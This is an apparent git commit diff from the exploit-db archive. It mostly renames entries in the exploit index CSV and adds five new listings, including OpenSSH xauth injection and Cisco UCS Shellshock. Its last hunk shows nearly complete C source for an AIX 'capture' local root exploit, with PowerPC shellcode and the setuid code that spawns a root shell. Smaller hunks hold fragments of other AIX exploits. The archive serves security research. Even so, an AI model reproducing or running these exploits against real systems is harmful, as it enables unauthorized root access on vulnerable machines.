DB: 2016-03-17

5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
This commit is contained in:
Offensive Security 2016-03-17 07:07:56 +00:00
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions

View file

@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0

Can't render this file because it is too large.

View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]

View file

@ -95,6 +95,6 @@ int main()
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]

View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/paginit", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
}
// milw0rm.com [2005-06-14]

View file

@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
// milw0rm.com [1997-05-27]
*/
// milw0rm.com [1997-05-27]

View file

@ -156,6 +156,6 @@ do
echo $L
L=`expr $L + 42`
./a.out $L
done */
// milw0rm.com [1997-05-26]
done */
// milw0rm.com [1997-05-26]

View file

@ -1,178 +1,178 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
